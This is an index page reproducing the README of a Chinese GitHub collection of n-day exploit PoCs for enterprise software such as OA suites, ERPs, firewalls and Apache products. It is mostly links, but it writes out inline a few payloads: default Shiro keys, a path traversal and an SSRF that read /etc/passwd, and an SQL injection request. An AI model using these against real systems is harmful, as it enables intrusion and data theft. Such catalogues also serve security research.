Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/Awrrays/FrameVul
POC集合,框架nday漏洞利用
https://github.com/Awrrays/FrameVul
Last synced: 3 months ago
JSON representation
POC集合,框架nday漏洞利用
- Host: GitHub
- URL: https://github.com/Awrrays/FrameVul
- Owner: Awrrays
- Created: 2022-04-04T05:54:00.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2024-06-17T02:39:42.000Z (5 months ago)
- Last Synced: 2024-06-17T03:42:37.946Z (5 months ago)
- Homepage:
- Size: 10.2 MB
- Stars: 347
- Watchers: 9
- Forks: 47
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - Awrrays/FrameVul - POC集合,框架nday漏洞利用 (Others)
README
# FrameVul
## 综合
- [主流供应商的一些攻击性漏洞汇总](https://github.com/r0eXpeR/supplier)
- [2021_Hvv漏洞](https://github.com/hhroot/2021_Hvv)
- [2022年Java应用程序的CVE漏洞](https://github.com/HackJava/CVE2022)
- [漏洞库合集](https://github.com/cckuailong/vulbase)
- [公开的信息、漏洞利用、脚本](https://github.com/pedrib/PoC)
- [Goby POC](https://github.com/aetkrad/goby_poc)
- [nuclei-templates](https://github.com/projectdiscovery/nuclei-templates)
- [LiqunKit_](https://github.com/Liqunkit/LiqunKit_)
- [强化fscan的漏扫POC库](https://github.com/chaosec2021/fscan-POC)
- [在渗透测试中快速检测常见中间件、组件的高危漏洞。](https://github.com/1120362990/vulnerability-list)
- [OAExploit一款基于产品的一键扫描工具](https://github.com/achuna33/MYExploit)
- [批量扫描破解海康威视、大华等摄像头的常见漏洞。](https://github.com/WhaleFell/CameraHack)
- [网络摄像头漏洞检测脚本.Nmap (Nse Nmap script engine)](https://github.com/foggyspace/NsePocsuite-lua)
- [网络摄像头漏洞扫描工具 | Webcam vulnerability scanning tool](https://github.com/jorhelp/Ingram)
## 1Panel
[1Panel loadfile 后台文件读取漏洞](https://peiqi.wgpsec.org/wiki/webapp/1Panel/1Panel%20loadfile%20%E5%90%8E%E5%8F%B0%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html)
## 奥威亚视频云平台
[奥威亚视频云平台VideoCover.aspx接口存在任意文件上传漏洞 附POC](https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247484789&idx=1&sn=7a1fb2328cb346e2651bea73ba7b37b5)
## 昂捷ERP
[昂捷ERP多处接口存在SQL注入(0day)](https://mp.weixin.qq.com/s/r-m73kfEOgq93LP1t0fXoA)
## 宝塔
[宝塔面板Windows版提权方法](https://github.com/Hzllaga/BT_Panel_Privilege_Escalation)
[宝塔linux面板 <6.0 存储形xss](https://mp.weixin.qq.com/s/gtYyyhye90ZPILWCGsGKGQ)
## 百卓网络Smart
[百卓网络Smart S20文件上传漏洞](https://github.com/flyyue2001/cve/blob/main/smart_sql_updateos.md)
## 辰信领创
[辰信景云终端安全管理系统 login存在 SQL注入漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E8%BE%B0%E4%BF%A1%E9%A2%86%E5%88%9B/%E8%BE%B0%E4%BF%A1%E9%A2%86%E5%88%9B%20%E8%BE%B0%E4%BF%A1%E6%99%AF%E4%BA%91%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20login%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html)
## 钉钉
[钉钉RCE](https://github.com/crazy0x70/dingtalk-RCE)
## 亿邮电子邮件系统
[(CNVD-2021-26422)亿邮电子邮件系统 远程命令执行漏洞](https://github.com/Henry4E36/eyouRCE)
## 泛微OA
[泛微OA某版本的SQL注入漏洞](https://github.com/Wrin9/weaverOA_sql_injection)
[应用安全 - 软件漏洞 - 泛微OA漏洞汇总](https://www.cnblogs.com/AtesetEnginner/p/11558469.html)
[泛微 e-mobile 相关漏洞](https://mp.weixin.qq.com/s/nYTXWXs-40oR41k1UsHJyw)
[z1un/weaver_exp](https://github.com/z1un/weaver_exp)
[关于表达式注入的小记录](https://zhuanlan.zhihu.com/p/26052235)
[泛微 E-Mobile Ognl 表达式注入](https://blog.csdn.net/qq_27446553/article/details/68203308)
[泛微e-cology7.1 SOAP注入引发的血案](https://www.mrwu.red/web/1598.html)
[泛微协同商务系统e-cology某处SQL注入](https://www.uedbox.com/post/14232/)
[泛微e-cology OA Beanshell组件远程代码执行漏洞复现](https://mp.weixin.qq.com/s/LpXiLukOKMfMSa8gUYBqNA)
[ecology8_mobile_sql_inject](https://github.com/orleven/Tentacle/blob/6e1cecd52b10526c4851a26249339367101b3ca2/script/ecology/ecology8_mobile_sql_inject.py)
[泛微E-Cology WorkflowServiceXml RCE](http://wiki.peiqi.tech/PeiQi_Wiki/OA产品漏洞/泛微OA/泛微E-Cology%20WorkflowServiceXml%20RCE.html?h=泛微E-Cology%20WorkflowServiceXml%20RCE)
[泛微OA weaver.common.Ctrl 任意文件上传漏洞](https://mp.weixin.qq.com/s/ePYRFPfu-pvWMKSiffporA)
[泛微OA 前台GetShell复现](https://ailiqun.xyz/2021/05/02/泛微OA-前台GetShell复现/)
[泛微e-cology任意文件上传(已修复)](https://mp.weixin.qq.com/s/3ip7-U8BsWgq3N4SP5xd4w)
[泛微e-cology另一接口任意文件上传(已修复)](https://mp.weixin.qq.com/s/nRnNyFfDQYxmFwA-7-IBVQ)
[OfficeServer 文件上传](https://github.com/sobinge/2022-HW-POC/blob/main/泛微OA%20uploaderOperate.jsp%20文件上传.md)
[E-office Server_v9.0 漏洞分析](https://mp.weixin.qq.com/s/JP-kIsWeQ0HZPs9jZjL24A)
[某 E-Office v9 任意文件上传漏洞复现](https://www.o2oxy.cn/3860.html)
[bigsizeme/CNVD-2021-49104](https://github.com/bigsizeme/CNVD-2021-49104)
[泛微oa漏洞利用工具](https://github.com/TD0U/WeaverScan)
[组合利用泛微信息泄漏漏洞和任意用户登录漏洞,可获取全部loginId并测试登录](https://github.com/A0WaQ4/Weaver_ofslogin_vul)
[泛微移动管理平台E-mobile lang2sql接口存在任意文件上传](https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247484476&idx=1&sn=2eeef68570e6ab7d8a2789e07b8609ad)
## 帆软报表
[帆软报表v8.0 Getshell漏洞分析](http://foreversong.cn/archives/1378)
[帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757](https://mp.weixin.qq.com/s/ae8A8PGJCtr6uS11dRpzcw)
[帆软 V9 getshell](https://www.o2oxy.cn/3368.html)
## 飞企互联
[飞企互联 FE业务协作平台 ShowImageServlet 任意文件读取漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E9%A3%9E%E4%BC%81%E4%BA%92%E8%81%94/%E9%A3%9E%E4%BC%81%E4%BA%92%E8%81%94%20FE%E4%B8%9A%E5%8A%A1%E5%8D%8F%E4%BD%9C%E5%B9%B3%E5%8F%B0%20ShowImageServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html)
[飞*互联登录绕过代码分析](https://mp.weixin.qq.com/s?__biz=MzIyNjk0ODYxMA==&mid=2247487275&idx=1&sn=4031748decc2d11fdffea2650ddaa1b0)
## 好视通-视频会议
[某某通视频会议存在任意文件读取漏洞](https://mp.weixin.qq.com/s?__biz=MzkwODMzOTA2NA==&mid=2247492873&idx=1&sn=6e9798e0a06b1cf92cb669c2178a13e1)
## 汉得SRM
[汉得SRM tomcat.jsp 登陆绕过漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E6%B1%89%E5%BE%97/%E6%B1%89%E5%BE%97SRM%20tomcat.jsp%20%E7%99%BB%E9%99%86%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.html)
## 华天动力-OA
[CVE-2021-45897 全球最大CRM系统SuiteCRM远程命令执行漏洞分析与复现](https://mp.weixin.qq.com/s/KVVgiECEr7ivBfXnByi5RQ)
## 金蝶云星空
[金蝶云星空任意文件上传漏洞](https://blog.csdn.net/qq_41904294/article/details/134204734)
[金蝶云星空管理中心 ScpSupRegHandler接口存在任意文件上传漏洞 附POC](https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247484562&idx=1&sn=fdd093b972b20fc842b110ac1cec75db)
## 金盘 微信管理平台
[金盘 微信管理平台 getsysteminfo 未授权访问漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E9%87%91%E7%9B%98/%E9%87%91%E7%9B%98%20%E5%BE%AE%E4%BF%A1%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20getsysteminfo%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.html)
## 金山终端安全系统
[金山终端安全系统V9.0SQL注入漏洞](https://github.com/luck-ying/Library-POC/blob/40f8d4051a239ac9b49c77ea0152c394e8b38acb/%E9%87%91%E5%B1%B1%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F/%E9%87%91%E5%B1%B1%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9FV9.0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.py)
## 蓝凌OA
[yuanhaiGreg/LandrayExploit](https://github.com/yuanhaiGreg/LandrayExploit)
[ 蓝凌OA的前后台密码的加解密工具](https://github.com/zhutougg/LandrayDES)
[蓝凌OA custom.jsp 任意文件读取漏洞](https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw)
[蓝某OA前台SSRF进一步利用到RCE](https://mp.weixin.qq.com/s/fNovp4mbKIMkVdF2ywcQcQ)
[蓝凌 OA treexml.tmpl script 远程代码执行漏洞](https://github.com/tangxiaofeng7/Landray-OA-Treexml-Rce)
[蓝凌EIS saveIm文件上传](https://github.com/MzzdToT/HAC_Bored_Writing/blob/main/Fileupload/%E8%93%9D%E5%87%8CEIS/EIS_upload.py)
## 联软准入系统
[联软准入系统任意文件上传](https://www.hedysx.com/2627.html)
## 绿盟 NF下一代防火墙
[绿盟 NF下一代防火墙 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E7%BB%BF%E7%9B%9F/%E7%BB%BF%E7%9B%9F%20NF%E4%B8%8B%E4%B8%80%E4%BB%A3%E9%98%B2%E7%81%AB%E5%A2%99%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)
## 契约锁
[漏洞利用:某某锁代码执行漏洞实战注入内存马](https://1oecho.github.io/oYmYrVh51/)
## 企望制造 ERP
[企望制造 ERP comboxstore.action 远程命令执行漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E4%BC%81%E6%9C%9B/%E4%BC%81%E6%9C%9B%E5%88%B6%E9%80%A0%20ERP%20comboxstore.action%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html)
## 锐捷
[锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/iot/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7%20NBR%20%E8%B7%AF%E7%94%B1%E5%99%A8%20fileupload.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)
[锐捷 BCR商业无线云网关 后台命令执行漏洞](https://peiqi.wgpsec.org/wiki/iot/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7%20BCR%E5%95%86%E4%B8%9A%E6%97%A0%E7%BA%BF%E4%BA%91%E7%BD%91%E5%85%B3%20%E5%90%8E%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html)
## 若依
默认Key
```
fCq+/xW488hMTCD+cmJ3aQ==
zSyK5Kp6PZAAjlT+eeNMlg==
```
后台任意文件读取
- RuoYi <= v4.5.0
```
/common/download/resource?resource=/profile/../../../../etc/passwd
```
Druid 未授权访问
```
/prod-api/druid/index.html
```
[若依后台定时任务一键利用](https://github.com/passer-W/Ruoyi-All)
[Xcheck Java引擎漏洞挖掘&防护识别](https://mp.weixin.qq.com/s/FPMUVoSqc0Lsf5BQx07ADw)
[记一次若依cms后台getshell](https://bkfish.gitee.io/2021/06/26/记一次若依cms后台getshell/)
[用于windows反弹shell的yaml-payload](https://github.com/bkfish/yaml-payload-for-Win)
[若依CMS4.6.0后台RCE](https://www.cnblogs.com/r00tuser/p/14693462.html)
[若依CMS后台getshell](http://www.yongsheng.site/2021/08/31/若依CMS后台getshell/)
## 深信服 Sangfor
[深信服 应用交付管理系统 login 远程命令执行漏洞](https://peiqi.wgpsec.org/wiki/webapp/%E6%B7%B1%E4%BF%A1%E6%9C%8D/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20login%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html)
## 通达OA
[通达OA多处SQL注入漏洞](https://mp.weixin.qq.com/s/DcwDz11f6g7uguuBGsin7A)
[OA-HUNTER/TongDa-OA](https://github.com/OA-HUNTER/TongDa-OA)
[ 通达OA综合利用工具](https://github.com/xinyu2428/TDOA_RCE)
[python编写的多个通达常见漏洞exp](https://github.com/kitezzzGrim/tongda-exp)
[通达OA V11.5电子邮箱接口SQL注入复现](https://mp.weixin.qq.com/s/3JtV-oVGIyzy9ly6n4fMiA)
[通达OA任意文件上传和文件包含漏洞导致RCE详细代码审计分析及Poc构造复现](https://www.freebuf.com/column/230871.html)
[jas502n/OA-tongda-RCE](https://github.com/jas502n/OA-tongda-RCE)
[通达OA11.6 preauth RCE 0day分析](https://drivertom.blogspot.com/2020/08/oa116-preauth-rce-0day.html)
[poc_and_exp/rce.py](https://github.com/TomAPU/poc_and_exp/blob/master/rce.py)
[通达OA v11.7后台SQL注入到RCE 0day](https://mp.weixin.qq.com/s/rtX9mJkPHd9njvM_PIrK_Q)
[通达OA v11.7 在线用户登录漏洞](https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ)
[通达OA11.7 利用新思路(附EXP)](https://mp.weixin.qq.com/s/LJRI04VViL4hbt6dbmGHAw)
[通达OA 后台getshell 新思路](https://www.o2oxy.cn/2738.html)
[通达 OA 11.7 组合拳 RCE 利用分析](https://sec-in.com/article/921)
[通达OA v11.8 存储型XSS 与 命令执行](https://www.tooltool.net/2710355.html)
[通达 OA 代码审计篇二 :11.8 后台 Getshell](https://paper.seebug.org/1499/)
[通达oa 11.8 后台getshell](https://github.com/z1un/TongdaOA-exp)
[通达OA-V11.8-api-ali.php文件上传漏洞](https://www.cnblogs.com/hmesed/p/16195551.html)
通达OA v11.9 upsharestatus 后台SQL注入漏洞
```
POST /general/appbuilder/web/portal/workbench/upsharestatus HTTP/1.1
Content-Type: application/x-www-form-urlencoded
uid=15&status=1&id=1;select sleep(4)
```
[某知名OA高版本getshell思路(附部分脚本)](https://mp.weixin.qq.com/s/HU-KxA75PR3u47QOqKWktQ)
[通达OA v11.10 sql注入漏洞复现](https://www.yulate.com/303.html)
## 网神
[网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞 ](https://peiqi.wgpsec.org/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecGate%203600%20%E9%98%B2%E7%81%AB%E5%A2%99%20obj_app_upfile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)
## 网御 ACM上网行为管理系统
[网御 ACM上网行为管理系统 bottomframe.cgi SQL注入漏洞](https://peiqi.wgpsec.org/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E5%BE%A1%20ACM%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20bottomframe.cgi%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html)
## 万户OA
- [户OA smartUpload.jsp 任意文件上传漏洞](https://anpaini.com/2022/OA产品漏洞/万户OA%20smartUpload.jsp%20任意文件上传漏洞/)
- [万户OA upload任意文件上传漏洞复现](https://blog.csdn.net/qq_41904294/article/details/134515628)
## 信呼 OA
[信呼OA存储型XSS 0day复现](https://xz.aliyun.com/t/7887)
## 云时空社会化商业ERP系统
[云时空社会化商业ERP系统gpy任意文件上传漏洞RCE](https://mp.weixin.qq.com/s?__biz=MzkyOTQ1MjQwMw==&mid=2247483863&idx=1&sn=fca9ddbb361c88112279929d5c25065b)
## 用友NC
[用友nc数据库密码解密](https://github.com/jas502n/ncDecode)
[kezibei/yongyou_nc_poc](https://github.com/kezibei/yongyou_nc_poc)
[用友GRP-U8行政事业财务管理软件 SQL注入 CNNVD-201610-923](http://wiki.peiqi.tech/PeiQi_Wiki/OA产品漏洞/用友OA/用友GRP-U8行政事业财务管理软件%20SQL注入%20CNNVD-201610-923.html)
[用友NC反序列化漏洞简单记录(DeleteServlet、XbrlPersistenceServlet等)](https://www.jianshu.com/p/14449a6edd05)
[用友 NC XbrlPersistenceServlet反序列化](http://wiki.peiqi.tech/PeiQi_Wiki/OA产品漏洞/用友OA/用友%20NC%20XbrlPersistenceServlet反序列化.html)
[某C 1day 反序列化漏洞的武器级利用](https://mp.weixin.qq.com/s/IdXYbjNVGVIasuwQH48Q1w)
[用友NC任意文件上传漏洞复现](https://www.adminxe.com/2075.html)
[用友nc 反序列化回显构造思路](https://zhzhdoai.github.io/2020/09/17/某NC-反序列化回显构造/)
[用友NC反序列化 简单分析](https://blog.sari3l.com/posts/608d18f0/)
[CNVD-2022-60632 畅捷通任意文件上传漏洞复现](https://www.o2oxy.cn/4104.html)
[用友 NC Cloud jsinvoke 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20NC%20Cloud%20jsinvoke%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)
[用友 移动管理系统 uploadApk.do 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20%E7%A7%BB%E5%8A%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20uploadApk.do%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)
[用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞](https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20CRM%E5%AE%A2%E6%88%B7%E5%85%B3%E7%B3%BB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20getemaildata.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html)
[用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20CRM%E5%AE%A2%E6%88%B7%E5%85%B3%E7%B3%BB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20getemaildata.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)
## 用友U8Cloud
[[在野漏洞]用友U8-cloud SQL注入漏洞](https://mp.weixin.qq.com/s?__biz=MzkxMTUwOTY1MA==&mid=2247483833&idx=1&sn=ff942057f579b746a56cd799c81f5064)
## 用友GRP
[用友GRP xxe getshell分析(附exp)](https://mp.weixin.qq.com/s?__biz=MzkxNjQyMjcwMw==&mid=2247485270&idx=1&sn=6d10fa9d349c3104bf317c5849e9f299)
## 致远OA
[致远OA管理员密码的重置](https://blog.csdn.net/qq_33064191/article/details/119921106)
[数据库Pass解密](https://github.com/Rvn0xsy/PassDecode-jar)
[Seeyon A8 登录hash破解案例](https://www.hedysx.com/2807.html)
[Summer177/seeyon_exp](https://github.com/Summer177/seeyon_exp)
[nex121/SeeyonEXP](https://github.com/nex121/SeeyonEXP)
[致远OA帆软报表组件反射型XSS&SSRF漏洞](https://landgrey.me/blog/7/)
[致远OA帆软报表组件前台XXE漏洞挖掘过程](https://landgrey.me/blog/8/)
[致远A8协同办公系统poc/seeyon 0day](https://www.jianshu.com/p/562f45edde2d)
[致远 OA A8 htmlofficeservlet getshell (POC&EXP)](http://wyb0.com/posts/2019/seeyon-htmlofficeservlet-getshell/)
[致远OA任意管理员登陆漏洞分析](https://mp.weixin.qq.com/s/tWKCgmptOsouOllDSXBTiw)
[致远OA ajax.do登录绕过任意文件上传](https://mp.weixin.qq.com/s/dk6aZY2fuJ_08tSOOh1Vzw)
[致远OA ajaxAction formulaManager 文件上传漏洞](https://mp.weixin.qq.com/s/ZyPwCytO7NLUuo9rfKtgyQ)
[致远OA fastjson远程代码执行漏洞复现](https://mp.weixin.qq.com/s/a1KbLlb7ZOXfeXUyhLhpMw)
[致远伪0day_FastJson利用链](https://mp.weixin.qq.com/s/yTuQLqqvikwo1KfK-zGBBA)
[致远 OA FastJson rce 回显](https://96.mk/2021/07/10/19.html)
[致远oa xxe getshell分析(附脚本)](https://mp.weixin.qq.com/s/efuMlGrjYsUjP7nP3W2F4w)
[某远M3 前台远程代码执行漏洞](https://xz.aliyun.com/t/13078)
[致远M3-server反序列化RCE漏洞复现(附POC)](https://mp.weixin.qq.com/s?__biz=MzU1ODQ2NTY3Ng==&mid=2247484745&idx=1&sn=98c5d18f55ff883a186ce0a5527c2c64)
## 浙大恩特客户资源管理系统
[浙大恩特客户资源管理系统fileupload.jsp文件上传](https://mp.weixin.qq.com/s/8BpPzi_7SfJWEQG5N988Mg)
[浙大恩特CRM文件上传(梅开二度)](https://mp.weixin.qq.com/s/TUICrxb3HjTBxe175hI7Fg)
[【紧急警告】某大科恩CMR 0day](https://mp.weixin.qq.com/s?__biz=MzkxMDYwNDI0MA==&mid=2247483841&idx=1&sn=9e29324912fa755f24265ce0d6446e84)
## 74CMS
[骑士 CMS 6.0.48以下文件包含getshell](https://mp.weixin.qq.com/s/erBzIapx1bz8f1ArWwwBwQ)
## Adminer
[Adminer≤4.6.2任意文件读取漏洞](https://mp.weixin.qq.com/s/ZYGN8WceT2L-P4yF6Z8gyQ)
## Apache
[利用最新Apache解析漏洞(CVE-2017-15715)绕过上传黑名单](https://www.leavesongs.com/PENETRATION/apache-cve-2017-15715-vulnerability.html)
[Apache HTTPD 换行解析漏洞(CVE-2017-15715)](https://vulhub.org/#/environments/httpd/CVE-2017-15715/)
[Apache SSI 远程命令执行漏洞](https://vulhub.org/#/environments/httpd/ssi-rce/)
[Apache 提权漏洞(CVE-2019-0211)复现](https://paper.seebug.org/889/)
[【最新漏洞预警】CVE-2021-40438-Apache httpd mod_proxy SSRF漏洞深入分析与复现](https://mp.weixin.qq.com/s/tYM6z9S1WZjPjfCt2MHOAQ)
[Apache mod_proxy SSRF(CVE-2021-40438)的一点分析和延伸](https://mp.weixin.qq.com/s/sbFs7kZ8tExwZPeUvq1hJw)
[CVE-2021-41773 | CVE-2021-42013 漏洞利用工具 (Apache/2.4.49-2.4.50)](https://github.com/CalfCrusher/Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit)
[Apache任意文件读取补丁绕过(CVE-2021-42013)](https://mp.weixin.qq.com/s/UzKu4mze02umEhxJAJpp9g)
[Apache2.4.50 CVE-2021-41773 cve-2021-42013 复现](https://www.o2oxy.cn/3740.html)
## Apache ActiveMQ
[ActiveMQ系列漏洞汇总复现](https://mp.weixin.qq.com/s/5U7v22q2WeLmCnkq7mfr8w)
[ActiveMQ 反序列化漏洞 (CVE-2015-5254)](https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2015-5254/README.zh-cn.md)
[ActiveMQ任意文件写入漏洞 (CVE-2016-3088)](https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2016-3088/README.zh-cn.md)
[ActiveMQ RCE](https://github.com/trganda/ActiveMQ-RCE)
[CVE-2023-46604 之 ActiveMQ RCE 漏洞验证/利用工具](https://mp.weixin.qq.com/s?__biz=Mzk0NjQ5MTM1MA==&mid=2247485403&idx=2&sn=0cdcd266b4761c8ee0ff57bb0b399b08)
## Apache Airflow
[Mr-xn/CVE-2022-40127](https://github.com/Mr-xn/CVE-2022-40127)
## Apache APISIX
[CVE-2022-24112 Apache APISIX apisix/batch-requests RCE](https://github.com/Mr-xn/CVE-2022-24112/blob/main/CVE-2022-24112.yaml)
[Apisix dashboard未授权访问到rce,含发现poc思路&复现环境](https://mp.weixin.qq.com/s/knTotxOeFlzcxvoQYSljCQ)
## Apache Axis
[Apache Axis1 与 Axis2 WebService 的漏洞利用总结](https://paper.seebug.org/1489/#2-apache-axis2)
[axis 1.4 AdminService未授权访问 jndi注入利用](https://jianfensec.com/渗透测试/axis 1.4 AdminService未授权访问 jndi注入命令执行利用/)
[KibodWapon/Axis-1.4-RCE-Poc](https://github.com/KibodWapon/Axis-1.4-RCE-Poc)
[【漏洞复现】Axis2默认弱口令后台Getshell](https://mp.weixin.qq.com/s/Gp_FMM-n472wYTBA5lC3lw)
## Apache Druid
[Apache Druid 漏洞总结](https://mp.weixin.qq.com/s/ZT5j9clfENsEWMSKuKkw1g)
[Druid未授权(弱口令)的一些利用方式](https://www.cnblogs.com/cwkiller/p/12483223.html)
[Druid未授权漏洞实战利用](https://www.t00ls.net/articles-62541.html)
[yuyan-sec/druid_sessions](https://github.com/yuyan-sec/druid_sessions)
[Apache Druid 远程代码执行漏洞 CVE-2021-25646](http://wiki.peiqi.tech/PeiQi_Wiki/Web服务器漏洞/Apache/Apache Druid/Apache Druid 远程代码执行漏洞 CVE-2021-25646.html)
[漏洞复现: Apache Druid 远程代码执行漏洞 (CVE-2021-25646)](https://paper.seebug.org/1476/)
[Apache Druid CVE-2021-26919 漏洞分析](http://m0d9.me/2021/04/21/Apache-Druid-CVE-2021-26919-漏洞分析/)
CVE-2021-36749
```sh
curl http://127.0.0.1:8888/druid/indexer/v1/sampler?for=connect -H "Content-Type:application/json" -X POST -d "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}"
```
## Apache Dubbo
[Apache Dubbo (CVE-2023-23638)漏洞利用的工程化实践](https://github.com/YYHYlh/Apache-Dubbo-CVE-2023-23638-exp)
## Apache Flink
[CVE-2020-17518&17519:Flink两个漏洞复现](https://mp.weixin.qq.com/s/9xLQ1YAWVtHBv9qVk-Xc1A)
[漏洞复现|Apache Flink(CVE-2020-17519)漏洞分析](https://mp.weixin.qq.com/s/6Z7ilX_bwSBU8EWfStAc5w)
## Apache Kylin
[CVE-2021-45456 apache kylin命令执行](https://github.com/Awrrays/Awrrays-Team-VulLab/blob/main/Middleware/apache/Apache Kylin/CVE-2021-45456.md)
## Apache Solr
[Solr RCE 整理](https://github.com/Imanfeng/Apache-Solr-RCE)
[Apache Solr 注入研究](https://github.com/veracode-research/solr-injection)
[Apache solr XML 实体注入漏洞 (CVE-2017-12629)](https://vulhub.org/#/environments/solr/CVE-2017-12629-XXE/)
[Apache Solr 远程命令执行漏洞 (CVE-2017-12629)](https://vulhub.org/#/environments/solr/CVE-2017-12629-RCE/)
https://github.com/mpgn/CVE-2019-0192/
[Apache Solr 远程命令执行漏洞 (CVE-2019-0193)](https://vulhub.org/#/environments/solr/CVE-2019-0193/)
[Apache Solr DataImportHandler 远程代码执行漏洞(CVE-2019-0193) 分析](https://paper.seebug.org/1009/)
[jas502n/CVE-2019-0193](https://github.com/jas502n/CVE-2019-0193)
[Apache Solr不安全配置远程代码执行漏洞复现及jmx rmi利用分析](https://mp.weixin.qq.com/s/P626BC3-JcBc3ewdlslO2w)
[jas502n/CVE-2019-12409](https://github.com/jas502n/CVE-2019-12409)
[Apache Solr最新漏洞复现](https://xz.aliyun.com/t/6679)
[Microsoft Apache Solr RCE Velocity Template | Bug Bounty POC](https://blog.securitybreached.org/2020/03/31/microsoft-rce-bugbounty/)
[Apache Solr Velocity RCE 真的getshell了吗?](https://www.hayasec.me/2019/11/06/apache-solr-velocity-rce-getshell/)
[Solr 模板注入漏洞图形化一键检测工具](https://github.com/SDNDTeam/CVE-2019-17558_Solr_Vul_Tool)
[CVE-2020-13957:Apche Solr 未授权上传漏洞复现](https://mp.weixin.qq.com/s/EbNK_PQZwgR6K31HwjAVRQ)
[CVE-2020-13957 Apache Solr 未授权上传漏洞](https://mp.weixin.qq.com/s/5iwk08z3oP9Tim5ETBIBBg)
